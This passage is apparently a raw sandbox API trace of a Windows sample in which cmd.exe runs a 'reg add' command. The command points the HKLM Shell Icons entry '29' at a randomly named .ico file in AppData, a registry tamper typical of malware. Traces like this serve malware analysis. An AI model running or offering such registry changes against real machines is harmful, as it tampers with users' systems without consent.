(lpModuleName="KERNEL32.DLL") returned 0x76910000 [0114.876] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0114.876] SetThreadUILanguage (LangId=0x0) returned 0x409 [0114.877] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0114.877] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afc74 | out: phkResult=0x1afc74*=0x0) returned 0x2 [0114.877] VirtualQuery (in: lpAddress=0x1afcab, lpBuffer=0x1afc44, dwLength=0x1c | out: lpBuffer=0x1afc44*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0114.877] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afc44, dwLength=0x1c | out: lpBuffer=0x1afc44*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0114.877] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afc44, dwLength=0x1c | out: 
lpBuffer=0x1afc44*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0114.877] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afc44, dwLength=0x1c | out: lpBuffer=0x1afc44*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0114.877] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afc44, dwLength=0x1c | out: lpBuffer=0x1afc44*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0114.877] GetConsoleOutputCP () returned 0x1b5 [0114.877] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0114.877] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0114.877] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.877] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0114.877] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.877] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0114.877] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.877] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0114.878] _get_osfhandle (_FileHandle=0) returned 0x3 [0114.878] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0114.878] _get_osfhandle (_FileHandle=0) returned 0x3 [0114.878] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0114.878] GetEnvironmentStringsW () returned 0x290388* [0114.878] FreeEnvironmentStringsW (penv=0x290388) returned 1 [0114.878] GetEnvironmentStringsW () returned 0x290388* [0114.878] FreeEnvironmentStringsW (penv=0x290388) returned 1 [0114.878] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aebe4 | out: 
phkResult=0x1aebe4*=0x40) returned 0x0 [0114.878] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aebec, lpData=0x1aebf0, lpcbData=0x1aebe8*=0x1000 | out: lpType=0x1aebec*=0x0, lpData=0x1aebf0*=0x38, lpcbData=0x1aebe8*=0x1000) returned 0x2 [0114.878] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aebec, lpData=0x1aebf0, lpcbData=0x1aebe8*=0x1000 | out: lpType=0x1aebec*=0x4, lpData=0x1aebf0*=0x1, lpcbData=0x1aebe8*=0x4) returned 0x0 [0114.878] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aebec, lpData=0x1aebf0, lpcbData=0x1aebe8*=0x1000 | out: lpType=0x1aebec*=0x0, lpData=0x1aebf0*=0x1, lpcbData=0x1aebe8*=0x1000) returned 0x2 [0114.878] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aebec, lpData=0x1aebf0, lpcbData=0x1aebe8*=0x1000 | out: lpType=0x1aebec*=0x4, lpData=0x1aebf0*=0x0, lpcbData=0x1aebe8*=0x4) returned 0x0 [0114.879] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aebec, lpData=0x1aebf0, lpcbData=0x1aebe8*=0x1000 | out: lpType=0x1aebec*=0x4, lpData=0x1aebf0*=0x40, lpcbData=0x1aebe8*=0x4) returned 0x0 [0114.879] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aebec, lpData=0x1aebf0, lpcbData=0x1aebe8*=0x1000 | out: lpType=0x1aebec*=0x4, lpData=0x1aebf0*=0x40, lpcbData=0x1aebe8*=0x4) returned 0x0 [0114.879] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aebec, lpData=0x1aebf0, lpcbData=0x1aebe8*=0x1000 | out: lpType=0x1aebec*=0x0, lpData=0x1aebf0*=0x40, lpcbData=0x1aebe8*=0x1000) returned 0x2 [0114.879] RegCloseKey (hKey=0x40) returned 0x0 [0114.879] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aebe4 | out: phkResult=0x1aebe4*=0x40) returned 0x0 [0114.879] RegQueryValueExW (in: 
hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aebec, lpData=0x1aebf0, lpcbData=0x1aebe8*=0x1000 | out: lpType=0x1aebec*=0x0, lpData=0x1aebf0*=0x40, lpcbData=0x1aebe8*=0x1000) returned 0x2 [0114.879] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aebec, lpData=0x1aebf0, lpcbData=0x1aebe8*=0x1000 | out: lpType=0x1aebec*=0x4, lpData=0x1aebf0*=0x1, lpcbData=0x1aebe8*=0x4) returned 0x0 [0114.879] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aebec, lpData=0x1aebf0, lpcbData=0x1aebe8*=0x1000 | out: lpType=0x1aebec*=0x0, lpData=0x1aebf0*=0x1, lpcbData=0x1aebe8*=0x1000) returned 0x2 [0114.879] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aebec, lpData=0x1aebf0, lpcbData=0x1aebe8*=0x1000 | out: lpType=0x1aebec*=0x4, lpData=0x1aebf0*=0x0, lpcbData=0x1aebe8*=0x4) returned 0x0 [0114.879] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aebec, lpData=0x1aebf0, lpcbData=0x1aebe8*=0x1000 | out: lpType=0x1aebec*=0x4, lpData=0x1aebf0*=0x9, lpcbData=0x1aebe8*=0x4) returned 0x0 [0114.879] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aebec, lpData=0x1aebf0, lpcbData=0x1aebe8*=0x1000 | out: lpType=0x1aebec*=0x4, lpData=0x1aebf0*=0x9, lpcbData=0x1aebe8*=0x4) returned 0x0 [0114.879] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aebec, lpData=0x1aebf0, lpcbData=0x1aebe8*=0x1000 | out: lpType=0x1aebec*=0x0, lpData=0x1aebf0*=0x9, lpcbData=0x1aebe8*=0x1000) returned 0x2 [0114.879] RegCloseKey (hKey=0x40) returned 0x0 [0114.879] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88635b [0114.879] srand (_Seed=0x5b88635b) [0114.879] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add 
\"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\Windows\\7l6OWDI9Fmrsoy1O.ico,0\"" [0114.879] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\Windows\\7l6OWDI9Fmrsoy1O.ico,0\"" [0114.879] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0114.879] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x291ae8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0114.880] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0114.880] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.880] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0114.880] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0114.880] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0114.880] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0114.880] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0114.880] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0114.880] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0114.880] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0114.880] _wcsicmp (_String1="PROMPT", 
_String2="HIGHESTNUMANODENUMBER") returned 8 [0114.880] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0114.880] GetEnvironmentStringsW () returned 0x2924d8* [0114.880] FreeEnvironmentStringsW (penv=0x2924d8) returned 1 [0114.880] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0114.880] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0114.880] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0114.880] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0114.880] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0114.880] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0114.880] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0114.880] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0114.880] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0114.880] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0114.880] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af9b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0114.881] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af9b0, lpFilePart=0x1af9ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af9ac*="Desktop") returned 0x18 [0114.881] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0114.881] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af72c | out: lpFindFileData=0x1af72c) returned 0x290b68 [0114.881] FindClose (in: hFindFile=0x290b68 | out: hFindFile=0x290b68) returned 1 [0114.881] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af72c | out: lpFindFileData=0x1af72c) returned 0x290b68 [0114.881] FindClose (in: hFindFile=0x290b68 | out: 
hFindFile=0x290b68) returned 1 [0114.881] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af72c | out: lpFindFileData=0x1af72c) returned 0x290b68 [0114.881] FindClose (in: hFindFile=0x290b68 | out: hFindFile=0x290b68) returned 1 [0114.881] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0114.881] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0114.881] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0114.881] GetEnvironmentStringsW () returned 0x290388* [0114.882] FreeEnvironmentStringsW (penv=0x290388) returned 1 [0114.882] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0114.882] GetConsoleOutputCP () returned 0x1b5 [0114.882] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0114.882] GetUserDefaultLCID () returned 0x409 [0114.882] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0114.883] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1afaf0, cchData=128 | out: lpLCData="0") returned 2 [0114.883] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1afaf0, cchData=128 | out: lpLCData="0") returned 2 [0114.883] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1afaf0, cchData=128 | out: lpLCData="1") returned 2 [0114.883] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0114.883] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0114.883] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0114.883] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, 
lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0114.883] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0114.883] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0114.883] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0114.883] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0114.883] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0114.883] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0114.883] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0114.884] GetConsoleTitleW (in: lpConsoleTitle=0x280a10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0114.884] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0114.884] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0114.884] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0114.884] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0114.885] _wcsicmp (_String1="reg", _String2=")") returned 73 [0114.885] _wcsicmp (_String1="FOR", _String2="reg") returned -12 [0114.885] _wcsicmp (_String1="FOR/?", _String2="reg") returned -12 [0114.885] _wcsicmp (_String1="IF", _String2="reg") returned -9 [0114.885] _wcsicmp (_String1="IF/?", _String2="reg") returned -9 [0114.885] _wcsicmp (_String1="REM", _String2="reg") returned 6 [0114.885] _wcsicmp (_String1="REM/?", _String2="reg") returned 6 [0114.888] _wcsicmp (_String1="FOR", _String2="reg") returned -12 [0114.888] _wcsicmp (_String1="FOR/?", _String2="reg") returned -12 
[0114.888] _wcsicmp (_String1="IF", _String2="reg") returned -9 [0114.888] _wcsicmp (_String1="IF/?", _String2="reg") returned -9 [0114.888] _wcsicmp (_String1="REM", _String2="reg") returned 6 [0114.888] _wcsicmp (_String1="REM/?", _String2="reg") returned 6 [0114.891] SetErrorMode (uMode=0x0) returned 0x0 [0114.891] SetErrorMode (uMode=0x1) returned 0x0 [0114.891] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x291fd0, lpFilePart=0x1af2a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af2a4*="Desktop") returned 0x18 [0114.891] SetErrorMode (uMode=0x0) returned 0x1 [0114.892] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0114.892] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0114.898] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.899] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\reg.*", fInfoLevelId=0x1, lpFindFileData=0x1af020, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af020) returned 0xffffffff [0114.899] GetLastError () returned 0x2 [0114.899] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\reg", fInfoLevelId=0x1, lpFindFileData=0x1af020, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af020) returned 0xffffffff [0114.899] GetLastError () returned 0x2 [0114.899] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.*", fInfoLevelId=0x1, lpFindFileData=0x1af020, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af020) returned 0x280f68 [0114.899] FindClose (in: hFindFile=0x280f68 | out: hFindFile=0x280f68) returned 1 [0114.899] FindFirstFileExW (in: 
lpFileName="C:\\Windows\\system32\\reg.COM", fInfoLevelId=0x1, lpFindFileData=0x1af020, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af020) returned 0xffffffff [0114.899] GetLastError () returned 0x2 [0114.899] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.EXE", fInfoLevelId=0x1, lpFindFileData=0x1af020, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af020) returned 0x280f68 [0114.899] FindClose (in: hFindFile=0x280f68 | out: hFindFile=0x280f68) returned 1 [0114.900] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0114.900] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0114.900] GetConsoleTitleW (in: lpConsoleTitle=0x1af518, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0115.059] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af3a0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af468 | out: lpAttributeList=0x1af3a0, lpSize=0x1af468) returned 1 [0115.059] UpdateProcThreadAttribute (in: lpAttributeList=0x1af3a0, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af460, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af3a0, lpPreviousValue=0x0) returned 1 [0115.059] GetStartupInfoW (in: lpStartupInfo=0x1af35c | out: lpStartupInfo=0x1af35c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0115.059] lstrcmpW (lpString1="\\reg.exe", lpString2="\\XCOPY.EXE") returned -1 [0115.061] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\reg.exe", lpCommandLine="reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, 
dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1af3fc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af448 | out: lpCommandLine="reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f ", lpProcessInformation=0x1af448*(hProcess=0x50, hThread=0x4c, dwProcessId=0xe1c, dwThreadId=0xe20)) returned 1 [0115.680] CloseHandle (hObject=0x4c) returned 1 [0115.680] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0115.680] GetEnvironmentStringsW () returned 0x2904f8* [0115.680] FreeEnvironmentStringsW (penv=0x2904f8) returned 1 [0115.680] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0116.411] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1af33c | out: lpExitCode=0x1af33c*=0x0) returned 1 [0116.411] CloseHandle (hObject=0x50) returned 1 [0116.411] _vsnwprintf (in: _Buffer=0x1af484, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af348 | out: _Buffer="00000000") returned 8 [0116.411] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0116.411] GetEnvironmentStringsW () returned 0x2922b8* [0116.411] FreeEnvironmentStringsW (penv=0x2922b8) returned 1 [0116.412] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0116.412] GetEnvironmentStringsW () returned 0x2922b8* [0116.412] FreeEnvironmentStringsW (penv=0x2922b8) returned 1 [0116.412] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af3a0 | out: lpAttributeList=0x1af3a0) [0116.412] GetConsoleTitleW (in: lpConsoleTitle=0x1af784, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0116.412] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0116.412] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0116.412] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0116.412] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\reg.*", fInfoLevelId=0x1, lpFindFileData=0x1af020, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af020) returned 0xffffffff [0116.412] GetLastError () returned 0x2 [0116.412] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\reg", fInfoLevelId=0x1, lpFindFileData=0x1af020, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af020) returned 0xffffffff [0116.412] GetLastError () returned 0x2 [0116.413] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.*", fInfoLevelId=0x1, lpFindFileData=0x1af020, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af020) returned 0x28e558 [0116.413] FindClose (in: hFindFile=0x28e558 | out: hFindFile=0x28e558) returned 1 [0116.413] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.COM", fInfoLevelId=0x1, lpFindFileData=0x1af020, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af020) returned 0xffffffff [0116.413] GetLastError () returned 0x2 [0116.413] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.EXE", fInfoLevelId=0x1, lpFindFileData=0x1af020, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af020) returned 0x28e558 [0116.413] FindClose (in: hFindFile=0x28e558 | out: hFindFile=0x28e558) returned 1 [0116.413] _wcsicmp 
(_String1=".EXE", _String2=".BAT") returned 3 [0116.413] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0116.413] GetConsoleTitleW (in: lpConsoleTitle=0x1af518, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0116.413] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af3a0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af468 | out: lpAttributeList=0x1af3a0, lpSize=0x1af468) returned 1 [0116.413] UpdateProcThreadAttribute (in: lpAttributeList=0x1af3a0, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af460, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af3a0, lpPreviousValue=0x0) returned 1 [0116.413] GetStartupInfoW (in: lpStartupInfo=0x1af35c | out: lpStartupInfo=0x1af35c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0116.413] lstrcmpW (lpString1="\\reg.exe", lpString2="\\XCOPY.EXE") returned -1 [0116.413] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\reg.exe", lpCommandLine="reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\Windows\\7l6OWDI9Fmrsoy1O.ico,0\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1af3fc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\Windows\\7l6OWDI9Fmrsoy1O.ico,0\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, 
